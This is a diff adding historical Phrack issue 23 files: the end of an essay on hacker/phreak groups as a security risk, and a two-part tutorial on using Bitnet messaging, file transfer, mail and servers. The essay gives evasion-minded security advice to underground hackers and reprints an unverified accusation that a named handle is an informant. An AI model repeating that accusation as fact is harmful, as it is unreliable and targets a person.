+       <>  A Study On The Occurrence Of Groups Within The Community  <>
+       <>                                                            <>
+       <>                Presented by Knight Lightning               <>
+       <>                       August 8, 1988                       <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+               A Rose By Any Other Name... Would Smell As Sweet
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+          The Administration \ Advanced Telecommunications, Inc./ATI
+         ALIAS \ American Tone Travelers \ Anarchy Inc. \ Apple Mafia
+  The Association \ Atlantic Pirates Guild/APG \ Bad Ass Mother Fuckers/BAMF
+    Bellcore \ Bell Shock Force/BSF \ Black Bag \ Camorra \ C&M Productions
+   Catholics Anonymous \ Chaos Computer Club \ Chief Executive Officers/CEO
+ Circle Of Death \ Circle Of Deneb \ Club X \ Coalition of Hi-Tech Pirates/CHP
+        Coast-To-Coast \ Corrupt Computing \ Cult Of The Dead Cow/-cDc-
+    Custom Retaliations \ Damage Inc. \ D&B Communications \ The Dange Gang
+            Dec Hunters \ Digital Gang/DG \ DPAK \ Eastern Alliance
+          The Elite Hackers Guild \ Elite Phreakers and Hackers Club
+  The Elite Society Of America \ EPG \ Executives Of Crime \ Extasyy (Elite)
+   Fargo 4A \ Farmers Of Doom/FOD \ The Federation \ Feds R Us \ First Class
+          Five O \ Five Star \ Force Hackers \ The 414s \ Hack-A-Trip
+Hackers Of America/HOA \ High Mountain Hackers \ High Society \ The Hitchhikers
+       IBM Syndicate \ The Ice Pirates Imperial Warlords \ Inner Circle
+                        Inner Circle II \ Insanity Inc.
+International Computer Underground Bandits/ICUB \ Justice League of America/JLA
+     Kaos Inc. \ Knights Of Shadow/KOS \ Knights Of The Round Table/KOTRT
+       League Of Adepts/LOA \ Legion Of Doom/LOD \ Legion Of Hackers/LOH
+       Lords Of Chaos \ Lunitic Labs, Unlimited \ Master Hackers \ MAD!
+            The Marauders \ MD/PhD \ Metal Communications, Inc./MCI
+  MetalliBashers, Inc./MBI \ Metro Communications \ Midwest Pirates Guild/MPG
+       NASA Elite \ The NATO Association \ Neon Knights \ Nihilist Order
+Order Of The Rose \ OSS \ Pacific Pirates Guild/PPG \ Phantom Access Associates
+                PHido PHreaks \ Phlash \ PhoneLine Phantoms/PLP
+              Phone Phreakers Of America/PPOA \ Phortune 500/P500
+               Phreak Hack Delinquents \ Phreak Hack Destroyers
+         Phreakers, Hackers, And Laundromat Employees Gang/PHALSE Gang
+     Phreaks Against Geeks/PAG \ Phreaks Against Phreaks Against Geeks/PAP
+      Phreaks and Hackers of America \ Phreaks Anonymous World Wide/PAWW
+             Project Genesis \ The Punk Mafia/TPM \ The Racketeers
+ Red Dawn Text Files/RDTF \ Roscoe Gang \ SABRE \ Secret Circle of Pirates/SCP
+   Secret Service \ 707 Club \ Shadow Brotherhood \ Sharp Inc. \ 65C02 Elite
+    Spectral Force \ Star League \ Stowaways \ Strata-Crackers \ The Phrim
+     Team Hackers '86 \ Team Hackers '87 \ TeleComputist Newsletter Staff
+ Tribunal Of Knowledge/TOK \ Triple Entente \ Turn Over And Die Syndrome/TOADS
+  300 Club \ 1200 Club \ 2300 Club \ 2600 Club \ 2601 Club \ 2AF \ Ware Brigade
+           The Warelords \ WASP \ The United Soft WareZ Force/TuSwF
+                       United Technical Underground/UTU
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Its literally unbelievable just how many different groups and organizations
+there are or have been in the phreak/hack/pirate community.  The list of 130
+groups displayed above is probably still just a fraction of the actual amount
+of groups that there have been, but those are the only ones I am aware of at
+this time.
+
+In the past John Maxfield has estimated that there are about 50,000
+hackers/phreaks/pirates operating in the United States today.  That figure has
+multiplied to to a point where it probably comes close to 500,000.  Believe it
+or not, almost everyone has been a member of one of the above groups (or
+perhaps a group not mentioned) at one time or another.
+
+Today's telecom security consultants and law enforcement agencies know this too
+and that is how group affiliations can be turned against us.
+
+What does being in a group mean?  In the modem community being in a group is
+supposed to mean that the people in the group work on projects together and
+trade specific information that people outside of the group are not allowed to
+access and by the same token, have no way to get it.  However, obviously the
+people in the group all feel that the other people with whom they are sharing
+information, can be trusted and are worthy of associating with them to begin
+with.  So when you stop and think about it, if there was no group, the people
+in question would still be trading information and would still trust each other
+because they would not have formed the group unless this criteria was met in
+the first place.  So in truth, being in a group really means nothing on the
+basis previously mentioned.
+
+You see in the modem community, being in a group really is more like a power
+trip or a "security blanket" for people who feel that they need to let people
+know that they associate with a specific clique in the hopes that the
+popularity of some of the other members will lend popularity to themselves.
+
+Many groups form in such a way that they try to make it look otherwise and thus
+begins the real problem.  Some groups are formed by a person who tries to get a
+lot of guys together that he feels knows a lot or seems to post a lot of good
+information - Bad Move; If you are going to form a group at all, stick with
+people who you know can be trusted (can you really ever "know" who can be
+trusted?) and then out of those people form your group or choose who you feel
+should be in it.
+
+Anyway, to prove that they are elite, most groups begin to gather specific data
+for giving to group members, and this includes handing out their own names and
+phone numbers with other members of the group.  They feel a false loyalty and
+psychologically create such utter faith in all the members that the faith is
+ultimately blind and based on hopes and aspirations of greatness.
+
+What is the best way for a security agent or informant to blend in with the
+modem community?  Join as many groups as possible, start gathering data on
+the members, and spread your handle throughout the community to become "well
+known."
+
+Example:  Taken From Phrack World News Issue XV;
+
+           [This article has been edited for this presentation. -KL]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Mad Hatter; Informant?                                            July 31, 1987
+~~~~~~~~~~~~~~~~~~~~~~
+We at Phrack Inc. have uncovered a significant amount of information that has
+led us to the belief that Mad Hatter is an informant for some law enforcement
+organization.
+
+When Taran King, Cheap Shades, Forest Ranger, and Knight Lightning arrived at
+Control C's in Chicago, Illinois, Mad Hatter had already searched the place and
+had found some papers that could only have done ^C harm.   We destroyed this
+information and thought everything was ok.  However, as it turns out, we
+searched Mad Hatter's bags and found a duplicate set of this information and
+the general hypothesis was they he intended to leave it behind as incriminating
+evidence.
+
+Mad Hatter had also brought down several disks for the purpose of copying
+Phantasie Realm.  Please note; PR was an IBM program and MH has an apple.
+
+Control C told us that when he went to pick Mad Hatter up at the bus terminal,
+he watched the bus pull in and saw everyone who disembarked.  Suddenly Mad
+Hatter was there, but not from the bus he was supposed to have come in on.  In
+addition to this, he had baking soda wrapped in a five dollar bill that he
+tried to pass off as cocaine.  Perhaps to make us think he was cool or
+something.
+
+Mad Hatter constantly tried to get left behind at ^C's apartment for unknown
+reasons. He also was seen at a neighbor's apartment making unauthorized calls
+into the city of Chicago.  When asked who he called, his reply was "Don't worry
+about it."  Mad Hatter had absolutely no money with him during PartyCon (and
+incidentally he ate everything in ^C's refrigerator) and yet he insisted that
+although he had taken the bus down and had return trip tickets for the bus,
+that he would fly back home.  How was this going to be achieved?  He had no
+money and even if he could get a refund for the bus tickets, he would still be
+over $200 short.  When asked how he was going to do this, his reply was "Don't
+worry about it."
+
+On Saturday night while on the way to the Hard Rock Cafe, Mad Hatter asked
+Control C for the location of his computer system and other items 4 times.
+This is information that Hatter did not need to know, but perhaps a SS agent or
+someone could use very nicely.
+
+When Phrack Inc. discovered that Dan The Operator was an FBI informant and made
+the news public, several people were criticizing him on Free World II Private.
+Mad Hatter on the other hand, stood up for Noah and said that he was still his
+friend despite what had happened.  Then later when he realized that people were
+questioning his legitimacy, his original posts were deleted and he started
+saying how much he wanted to kill Dan The Operator and that he hated him.
+
+Mad Hatter already has admitted to knowing that Dan The Operator was an FBI
+informant prior to SummerCon '87.  He says the reason he didn't tell anyone is
+because he assumed we already knew.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+When Mad Hatter first entered the phreak/hack world, he joined;
+
+                     Phreaks Anonymous World Wide (PAWW),
+                     MetalliBashers, Inc (MBI),
+                     Order of The Rose, and
+                     Cult of The Dead Cow (-cDc-).
+
+If you were a security agent or a loser hacker turned informant and you wanted
+to mix in with the phreak/hack community, wouldn't you try to join as many
+groups as possible to spread your name?
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Phreaks Anonymous World Wide, MetalliBashers, Inc., Order of The Rose, and
+Cult of The Dead Cow, not exactly the toughest groups to join and once there is
+one security person in the group, he is bound to vouch for others, etc.  So
+while he spreads his name as an elite modem user throughout the community, he
+is busy gathering information on group members who are foolish enough to trust
+him.
+
+Its not bad enough that some groups are easy enough to infiltrate as it is, but
+does anyone remember this?
+
+Taken From Phrack World News Issue XI;
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Phortune 500:  Phreakdom's Newest Organization               February 16, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+For those of you who are in the least bit interested, Phortune 500 is a group
+of telecommunication hobbyists who's goal is to spread information as well as
+further their own knowledge in the world of telecommunications.  This new
+group was formed by:
+
+    Brew Associates / Handsomest One / Lord Lawless / The Renegade Chemist
+          Quinton J. Miranda / Striker / The Mad Hacker / The Spiker
+
+These eight members are also known as Board Of Directors (BOD).  They don't
+claim to be *Elite* in the sense that they are they world's greatest hacker,
+but they ARE somewhat picky about their members.  They prefer someone who knows
+a bit about everything and has talents exclusive to him/herself.
+
+One of the projects that Phortune 500 has completed is an individual password
+AE type system.  It's called TransPhor.  It was written and created by Brew
+Associates.  It has been Beta tested on The Undergraduate Lounge (Sysoped by
+Quinton J. Miranda).   It is due to be released to the public throughout the
+next few months.
+
+Phortune 500 has been in operation for about 4 months, and has released two
+newsletters of their own.  The Phortune 500 Newsletter is quite like the
+"People" of contemporary magazines.  While some magazines cover the deep
+technical aspects of the world in which we communicate, their newsletter tries
+to cover the lighter side while throwing in information that they feel is "of
+technical nature."  The third issue is due to be released by the end of this
+month.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+             *>=-> The Phortune 500 Membership Questionnaire <-=<*
+
+Note:  The following information is of a totally confidential nature.  The
+       reason you may find this so lengthy and in depth is for our knowledge of
+       you.  We, with Phortune 500, feel as though we should know prospective
+       members well before we allow them into our organization.  Pending the
+       answers you supply us, you will be admitted to Phortune 500 as a charter
+       member.  Please answer the following completely...
+...............................................................................
+
+Handle                          :
+First Name                      :
+Voice Phone Number              :
+Data Phone Number               :
+City & State                    :
+Age                             :
+Occupation (If Applicable)      :
+Place of Employment (Optional)  :
+Work Phone Number   (Optional)  :
+Computer Type                   :
+Modem Type                      :
+Interests                       :
+Areas Of Expertise              :
+References (No More Than Three) :
+Major Accomplishments (If Any)  :
+...............................................................................
+Answer In 50 Words Or Less;
+
+^*^  What Is Phortune 500 in Your Opinion?
+
+^*^  Why Do You Want To Be Involved With Phortune 500?
+
+^*^  How Can You Contribute to Phortune 500?
+...............................................................................
+
+Please answer each question to the best of your ability and then return to any
+Phortune 500 Board of Directors Member Or a Phortune 500 BBS:
+
+           The Private Connection (Limited Membership) 219-322-7266
+           The Undergraduate AE   (Private Files Only) 602-990-1573
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+An actual application form for joining a group.  Perhaps the concept was a good
+one, perhaps not, but from a standpoint of publicity and security, this was a
+complete and utter catastrophe.
+
+Basically we are all here to learn in one way or another.  Groups and clubs
+in our community only seem to segregate it and at a time when everyone should
+be pulling together, this is not such a good idea.  Privacy and security are
+important factors that motivate these sects within the society, but ultimately
+are the final consequences worth the trouble of creating a group?
+
+If groups had not been created, there would not be as much attention on the
+phreak/hack community as there is right now.  When group names start spreading,
+it starts the law enforcement agencies into a panic that its big time organized
+crime.  This allows them to justify more time and money into the apprehension
+of computer criminals and usually they go after the big names; the people in
+the most "elite" groups.
+
+Now before you, a member of a group, start criticizing this file, please
+understand, I am not referring to any particular groups here, just groups in
+general.  Any and all comments made about MBI, -cDc-, PAWW, OOTR, and P500
+should not be taken personally and were used only as examples of how groups can
+be potential security problems.
+
+There are some groups that are worthwhile organizations and its obvious because
+that have existed through the years and been productive.  However, the only way
+to keep this community alive is for everyone to work together to protect and
+learn from each other.
+
+:Knight Lightning
+
+                              "The Future Is Now"
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
diff --git a/phrack23/4.txt b/phrack23/4.txt
new file mode 100644
index 0000000..eaddf38
--- /dev/null
+++ b/phrack23/4.txt
@@ -0,0 +1,398 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 23, File 4 of 12
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>                           Utopia                           <>
+       <>                           ~~~~~~                           <>
+       <>         Chapter One of The Future Transcendent Saga        <>
+       <>                                                            <>
+       <>           An Introduction To The World Of Bitnet           <>
+       <>                                                            <>
+       <>                Presented by Knight Lightning               <>
+       <>                       January 1, 1989                      <>
+       <>                                                            <>
+       <>               Special Thanks To Jester Sluggo              <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+           Welcome To The Next MILLENNIUM Of The Communications Realm
+                              The Future is NOW!
+
+As most people will agree, college and university computers are the easiest to
+gain access to, both legally and illegally.  Bitnet is only one of the many
+interconnected wide area networks, but I felt that it was the most important to
+discuss because all major colleges and universities are connected by it and as
+such creating an almost utopian society for the technologically inclined.  It's
+free, legal, and world encompassing -- anything that incorporates "free" with
+"legal" and is useful has to hold some sort of perfection and thus the name of
+this file.
+
+For the people already on Bitnet, this file may seem somewhat basic and most
+likely contains information that you are thoroughly aware of, but you never w
+know what a little extra reading might lead you to discover.  Once again
+welcome to the future... a future where limits are unknown.
+
+:Knight Lightning
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                             The Origin Of BITNET
+                             ~~~~~~~~~~~~~~~~~~~~
+                               by Jester Sluggo
+
+In 1981, the City University of New York (CUNY) surveyed universities on the
+east coast of the United States and Canada, inquiring whether there was
+interest in creating and easy-to-use, economical network for interuniversity
+communication between scholars.  The response was positive.  Many shared the
+CUNY belief in the importance of computer-assisted communication between
+scholars.  The first link of the new network, called Bitnet, was established
+between CUNY and Yale University in May 1981.  The term BITNET is an acronym
+that stands for "Because It's Time NETwork."
+
+The network technology chosen for Bitnet was determined by the availability
+of the RSCS software on the IBM computers at the initial sites.  The RSCS is
+simple and effective, and most IBM VM/CMS computer systems have it installed
+for local communications, supporting file transfer and remote job entry
+services.  The standard Bitnet links are leased telephone lines running 9600
+bps.  Although the initial nodes were IBM machines in university computers
+centers, the network is in no way restricted to such systems.  Any computer
+with an RSCS emulator can be connected to Bitnet.  Emulators are available for
+Digital Equipment Corporation VAX/VMS systems, VAX-UNIX systems, and for
+Control Data Corporation Cyber systems and others.  Today, more than one-third
+of the computers on Bitnet are non-IBM systems.
+
+There is also some talk in the Bitnet scientific community of a merger between
+Bitnet and CSnet (Computer Science Network).  It is unknown when or if such a
+merger will take place, but it is only a step in the right direction.
+
+Note:  NetNorth is the Canadian division of Bitnet and EARN is the European
+       division of Bitnet.  They are all directly connected and together serve
+       as one network and not three.  It is often referred to as
+       BITNET/NetNorth/EARN.
+_______________________________________________________________________________
+
+The Basics Of Bitnet
+~~~~~~~~~~~~~~~~~~~~
+In order to make any sense out of this file, you should first have a basic
+understanding of mainframes and userids, etc.  Since most readers of Phrack are
+computer enthusiasts, there is a pretty good chance that you understand these
+things already.   If not, you may want to find documentation on the topic.  The
+Mentor's Beginning Hackers Guide, which was published in Phrack Inc. XXII
+contains some information that might help you.  The concepts presented in this
+file are not terrible difficult to understand, but you should not jump into
+this totally unprepared either.
+
+You should also be a little familiar with the type of hardware and operating
+system you will be using.  Most IBM systems in Bitnet run VM/CMS.  The Digital
+Equipment Corporation (DEC) VAX systems usually run an operating system called
+VMS along with a software package called JNET which allows them to communicate
+via Bitnet.  I will be referring to VM/CMS and VMS/JNET throughout this file.
+I myself currently use an IBM 4381 that runs VM/CMS and thus I am much more
+familiar with that type of system.
+
+Try to think of the mainframe as the telephone and Bitnet as the telephone
+lines.  You see, the mainframe you log onto is connected to mainframes at other
+universities and institutions.  The connection is usually a high-speed leased
+line, a special sort of telephone connection.  In a way, these computers are
+always on the phone with each other (except when links go down, discussed in
+the section on MESSAGES).  This particular network is what is known as a "store
+and forward" network.  This means that if I send something to someone in Los
+Angeles, the computers in the network between New York and California will
+store and forward it from computer to computer until it reaches it's
+destination.
+
+In Bitnet, there is only one way from "Point A" to "Point B."  A small piece of
+the network might look like this:
+
+              ---    ---    ---
+             | A |--| B |--| C |
+              ---    ---    ---
+                      |
+                     ---    ---    ---    ---    ---
+                    | D |--| E |--| F |--| G |--| H |
+                     ---    ---    ---    ---    ---
+                      |                    |
+              ---    ---                  ---    ---
+             | I |--| J |                | K |--| L |
+              ---    ---                  ---    ---
+                                           |
+                                   ---    ---    ---    ---
+                                  | M |--| N |--| O |--| P |
+                                   ---    ---    ---    ---
+
+Those boxes represent computers in the network, and the dashes between them are
+the leased lines.  If I am at computer "A" and I send a file to someone at
+computer "N" it would travel the following path:
+
+                              A-B-D-E-F-G-K-N
+
+Actual topology maps are available for download from LISTSERV@BITNIC, but we
+will be discussing servers later in this file.  Like I mentioned before, there
+is only one route between any two nodes and there is simply no way to bypass a
+disconnected link.
+
+Each of the computers in BITNET is called a "node" and has a unique name that
+identifies it to the other nodes.  For example, one of the mainframe computers
+at the University Of Missouri-Columbia has the nodename UMCVMB.  So what does
+that mean exactly?  Well in this case, UMC comes from the name of the school,
+VM comes from the Virtual Memory operating system, and B is just an
+alpha-numerical identifier.  At one time there was a UMCVMA, but that system
+was taken down a couple of years ago.  One thing to note here is that although
+this particular node can be broken down into its parts, many nodes do not
+follow this pattern and some nodes have "aliases."  An alias is just another
+name for the node and both names are recognized by all Bitnet facilities.  An
+example of this is STANFORD.  The nodes STANFORD and FORSYTHE are the same
+place so...
+
+                       CYPHER@STANFORD = CYPHER@FORSYTHE
+
+Your userid in combination with the name of your node is your "network
+address."  It is usually written in the format userid@node (read "userid at
+node").  For example, the name of my node is UMCVMB, and my userid is C483307.
+Therefore, my network address is C483307@UMCVMB.  If I know the userid@node of
+someone in the network, I can communicate with that person, and he/she can
+communicate with me.  I have found many interesting people on the networks.
+Making use of the direct chatting capabilities of Bitnet I am able to talk to
+them in "real-time."  You can do this too, all you need to know are a few
+commands.  This is explained in part two.
+
+
+Messages
+~~~~~~~~
+There are three basic methods of communicating via Bitnet:  MAIL, MESSAGE, and
+FILE.  The reason you would choose one over the other for a particular
+application will become clear after a little explanation.
+
+The MESSAGE is the fastest and most convenient method of communication
+available through Bitnet.  It is the network's equivalent of a telephone
+conversation.  The difference of course is that the words are typed instead of
+spoken.  The message you type is transmitted immediately (well, quickly) to its
+destination.  In BITNET this destination is the network address (userid@node)
+of the person you want to contact.  If the person you are contacting is logged
+on, the message will be displayed on their screen.  If not, their computer
+will tell you so by sending you a message.  In this case, your message is lost
+forever.  In other words, no one is there to answer the phone.  However, many
+people run a program called GONE (and there are other similar programs) which
+acts like an answering machine and holds your message until they log on.  Some
+universities do not allow this program because it uses a lot of CPU time.  If
+your school or mainframe does not allow it, do not try to sneak its use,
+because it is very easy to detect.
+
+One important thing to mention is that not all nodes allow interactive chat.
+Some nodes are simply not advanced enough for it and you will a receive a
+message telling you this whenever you try to chat with them.  However, this
+situation is less common.
+
+The command to send messages depends on your computer and system software.
+People on VM/CMS systems would type something like this:
+
+     TELL userid AT node message OR TELL userid@node message
+
+For example:
+
+     TELL MENTOR AT PHOENIX Hey, whats new on The Phoenix Project?
+          +-----    +------ +-------------------------------------
+          |         |       |
+          |         |       +----------- the message you are sending
+          |         |
+          |         +------------------- the node of the recipient
+          |
+          +----------------------------- the userid of the recipient
+
+
+People on VAX/VMS systems using the JNET networking software would use this
+syntax:
+
+     SEND userid@node "message"
+
+For example:
+
+     SEND MENTOR@PHOENIX "Hey, whats new on The Phoenix Project?"
+          +----- +------ +---------------------------------------
+          |      |       |
+          |      |       +-------------- the message you are sending
+          |      |
+          |      +---------------------- the node of the recipient
+          |
+          +----------------------------- the userid of the recipient
+
+
+The quotes around the message are optional.  However, the JNET networking for
+VAX/VMS will translate your entire message into upper-case characters if you
+DO NOT use them.  Many people find receiving messages in all upper case to be
+extremely annoying.
+
+For more information on the TELL and SEND commands, you should consult your
+local system documentation.
+
+When a message arrives on your screen, it will look something like this:
+
+     FROM PHOENIX(MENTOR):  Hello!  Things are great here, you?
+
+Unfortunately there is a downside to everything and Bitnet Messages are no
+exception.  Text sent by message must be short.  In general, your message
+length can be one line, about the width of your screen.  In other words, you
+won't be sending someone a copy of Phrack World News via the TELL command.
+
+Also, you can only communicate with someone in this way when they are logged
+on.  Considering time zone differences (you may find yourself talking to
+people in Europe, Israel, or Australia) this is often quite inconvenient.
+
+Lastly, there is the problem of links that I call LinkDeath.  If the connection
+to the node you want to contact is broken (by for example, a disconnected phone
+line), you'll receive an error message and whatever you sent is gone.  This can
+be very annoying if it should occur during a conversation.  The LinkDeath may
+last a few minutes or several hours.  Often times, a link will go down for the
+weekend and you are simply out of luck.  Even worse is when it is the link that
+connects your mainframe to rest of Bitnet... you are cut off.
+
+However, messages are very far from useless.  As I will demonstrate in chapter
+two, TELL and SEND are extremely helpful in accessing the many servers on
+Bitnet.
+
+
+Files
+~~~~~
+FILES are another way to communicate over Bitnet.  The text files and programs
+that you store on your computer can be transmitted to users at other nodes.
+This is one of the methods that I use to distribute Phrack issues across not
+only the country, but the world.  People on VM/CMS systems would use a syntax
+like this:
+
+     SENDFILE filename filetype filemode userid AT node
+
+For example:
+
+     SENDFILE PHRACK TEXTFILE A PROPHET AT PHRACKVM
+              +---------------- +------------------
+              |                 |
+              |                 +------- the address of the recipient
+              |
+              +------------------------- the file you are sending
+
+
+However, at my particular node the command would read:
+
+     SENDFILE PHRACK TEXTFILE A TO (nickname)
+
+For some reason at my node, you cannot use SENDFILE to send a file to anyone
+unless they are in your NAMES file.  The NAMES file is a database type of list
+that translates userid@node into nicknames to make it easier to chat with
+people.  This way you can use their nickname instead of the tiresome
+userid@node.  The filemode, in this example "A", is the disk that the file
+"PHRACK TEXTFILE" is on.  In case you were wondering, with the exception of my
+address, most of the addresses in this file like PROPHET@PHRACKVM or
+MENTOR@PHOENIX are bogus and just examples for this presentation.
+
+The syntax for VMS/JNET systems is quite similar:
+
+     SEND/FILE filename.extension userid@node
+
+For example:
+
+     SEND/FILE PHRACK.TEXTFILE PROPHET@PHRACKVM
+              +--------------- +---------------
+              |                |
+              |                +-------- the address of the recipient
+              |
+              +------------------------- the file you are sending
+
+
+The file sent is stored in the "electronic mailbox" of the recipient until
+he/she logs on.  People on VM/CMS systems would use the RECEIVE or RDRLIST
+(shortened to "RL") commands to process files sent to them in this way.  People
+on VAX/VMS systems would use the RECEIVE command.  You should check your local
+documentation for more information on these commands.
+
+SEND/FILE and SENDFILE are useful for sending programs or large volumes of data
+like Phrack issues over the network.  However, they should not be used for
+everyday communication because there is a much easier way -- the MAIL.
+
+
+Mail
+~~~~
+The other form of Bitnet communication has been given a very apt name:  MAIL
+(often called "electronic mail" or "e-mail").  Just like regular postal service
+mail, you provide an address, return address, and text.  Software for sending
+mail software differs from site to site, so you will have to look in your local
+documentation for information.  On my particular node, the return address (your
+address) is automatically placed in the letter.  This presentation should be
+able to shed some light on what most mail looks like and how it works.
+
+Mail files are really just specially formatted text files.  The feature that
+makes them different is the "mail header."  This tells a Bitnet system and your
+mail software that it is not a regular text file.  It looks something like
+this:
+
+                                           The address of the recipient
+                                                                      |
+                                                         The subject  |
+                                                                   |  |
+                                                     Your address  |  |
+                                                                |  |  |
+                                                   Todays date  |  |  |
+                                                             |  |  |  |
+     Date:         Fri, 29 Dec 88 23:52:00 EDT            <--+  |  |  |
+     From:         Forest Ranger <RANGER@STLVAX1>         <-----+  |  |
+     Subject:      Cable Pair Busted For Child Molestation<--------+  |
+     To:           Phrack World News <KNIGHT@MSPVMA>      <-----------+
+
+
+An entire mail message would look like this:
+
+
+  +---------------- Mail header
+  |
+  |  Date:         Fri, 29 Dec 88 23:52:00 EDT
+  |  From:         Forest Ranger <RANGER@STLVAX1>
+  |  Subject:      Cable Pair Busted For Child Molestation
+  |  To:           Phrack World News <KNIGHT@MSPVMA>
+  +  ========================================================================
+
+  +  Have you seen the newspapers?  Is this good news, or what?  I think that
+  |  the ramifications are startling.  This is one more step on the road to a
+  |  higher civilization.  I hope he gets what he deserves.  Keep in touch, I
+  |  will send more information later.
+  |
+  +---------------- Mail text
+
+
+Mail has a number of advantages.  The size of a mail file is limited only by
+you and is the only way to send files to networks other than Bitnet (However, I
+do not recommend that you transmit anything longer than 3000 lines).  When your
+mail reaches the destination address, it will be stored in the user's mailbox
+until they read it.  If the links to that particular node are disconnected,
+your mail will be held until the path is clear for the mail to continue on its
+route to the recipient's mailbox.
+
+The disadvantage of mail is that it is, indeed, slower than messages.  The
+longer your mail file, the longer it will take to get from Point A to Point B.
+_______________________________________________________________________________
+
+Conclusion
+~~~~~~~~~~
+Don't despair, this is only the conclusion to this file.  The best functions of
+Bitnet are yet to be described.  Join me in the second chapter of The Future
+Transcendent Saga -- Foundations Upon The Horizon.
+
+Also included in this issue of Phrack are sitelists for Bitnet.  Actual node
+directories are available from LISTSERV@BITNIC, but they are much too large to
+be printed here.  However, the files that are included list the names of the
+universities and institutions that are connected to Bitnet without their node
+addresses (some institutions have over 30+ nodes).  If you attend a college or
+university that is hooked into Bitnet, then join me in the realm of infinite
+discovery.  When you do, drop me a line...
+
+:Knight Lightning (C483307@UMCVMB)
+
+
+For related reading please see;
+
+An Insight On Wide-Area Networks Part 2 by Jester Sluggo
+(Phrack Inc. Issue 6, file 8)
+
+Communications Of The ACM
+_______________________________________________________________________________
diff --git a/phrack23/5.txt b/phrack23/5.txt
new file mode 100644
index 0000000..6d800c6
--- /dev/null
+++ b/phrack23/5.txt
@@ -0,0 +1,492 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 23, File 5 of 12
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>                Foundations Upon The Horizon                <>
+       <>                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~                <>
+       <>         Chapter Two of The Future Transcendent Saga        <>
+       <>                                                            <>
+       <>      Using Servers And Services In The World Of Bitnet     <>
+       <>                                                            <>
+       <>                Presented by Knight Lightning               <>
+       <>                       January 2, 1989                      <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+Welcome to the second chapter of The Future Transcendent Saga.  In this file,
+I will present the servers and services of Bitnet (although there are some
+services and servers on other networks as well).  You will learn what the
+servers are, how they differentiate, how to use them, and come to a better
+understanding of how these Foundations Upon The Horizon help make Bitnet a
+virtual Utopia.
+_______________________________________________________________________________
+
+What Is A Server?
+~~~~~~~~~~~~~~~~~
+One of most useful features of Bitnet is the variety of file servers, name
+servers, relays, and so on.  They might be described as "virtual machines" or
+"server machines."
+
+A "server" is a userid a lot like yours.  It may exist on your computer (node)
+or on some other BITNET node.  The people who set up this userid have it
+running a program that will respond to your commands.  This is a "server."  The
+commands you send and the way in which the server responds to them depends on
+the particular program being run.  For example, the servers UMNEWS@MAINE and
+107633@DOLUNI1 offer different types of services, and require different
+commands.  The various kinds of servers are described later in this document.
+
+You can send your commands to most servers in one of two formats:   MAIL or
+                                                                    MESSAGE.
+
+Not all servers accept commands via both formats, but this information is
+included in the document BITNET SERVERS which can be obtained from
+LISTSERV@BITNIC.  Because there are so many servers I will not even begin to
+list them here.  Different servers are created and disconnected everyday so it
+would be difficult to name them all.
+
+People on VM/CMS systems would send commands something like this:
+
+     TELL userid AT node command   (AT = @)
+
+For example:
+
+     TELL NETSERV@MARIST HELP
+
+People on VAX/VMS systems using the JNET networking software would use this
+syntax:
+
+     SEND userid@node "command"
+
+For example:
+
+     SEND NETSERV@MARIST "HELP"
+
+Many servers can also accept commands via mail.  Indeed, some will only accept
+your commands in that format, such as the servers on the non-Bitnet nodes.  The
+syntax for the commands you send remain the same.  You send mail to the server
+as if you were sending the mail to a person.  The text of your message would be
+the command.  Some servers will take the command as the first line of a text
+message, others require it in the "Subject:" line.  Some servers will accept
+more than one command in a mail message, others will take only one.   Here is
+an example of a mail message sent to LISTSERV@BITNIC requesting a list of
+files:
+
+
+     Date:         Fri, 30 Dec 88 23:52:00 EDT
+     From:         Taran King <SYSOP@MSPVMA>
+     To:           Listserv <LISTSERV@BITNIC>
+     ========================================================================
+     INDEX
+
+
+Throughout this file I will use examples where commands are sent to servers via
+message.   However, for many of the cases we will present you have option of
+using mail.  The choice is yours.
+
+There are two particularly confusing aspects of servers of which you should be
+aware.  First, servers in the same category (say, file servers) do not always
+accept the same commands.  Many of them are extremely different.  Others are
+just different enough to be annoying.  There are many approaches to setting up
+a server, and everyone is trying to build a better one.
+
+The second problem is that there are many servers that fill two, sometimes
+three categories of server.  For example, LISTSERV works as a list server and a
+file server.  Many LISTSERVs have been modified to act as name servers as well,
+but they are rather inefficient in this capacity.  If you do not understand
+this terminology, bear with me.  The best is yet to come.
+
+
+File Servers
+~~~~~~~~~~~~
+Remember that a server runs on a userid much like yours.  Like your userid, it
+has many capabilities, including the ability to store files (probably with a
+much greater storage capacity though).  The program that a file server runs
+enables it to send you files from its directory, as well as a list of files
+available.  These may be programs or text files.  You might look at these
+servers as Bitnet versions of dial-up bulletin boards or AE Lines.
+
+You can generally send three types of commands to a file server.  The first
+type is a request for a list of files the server offers.  The second is a
+request that a specific file be sent to your userid.  The third, and most
+important is a HELP command.
+
+The HELP command is very important because it is one of the few commands that
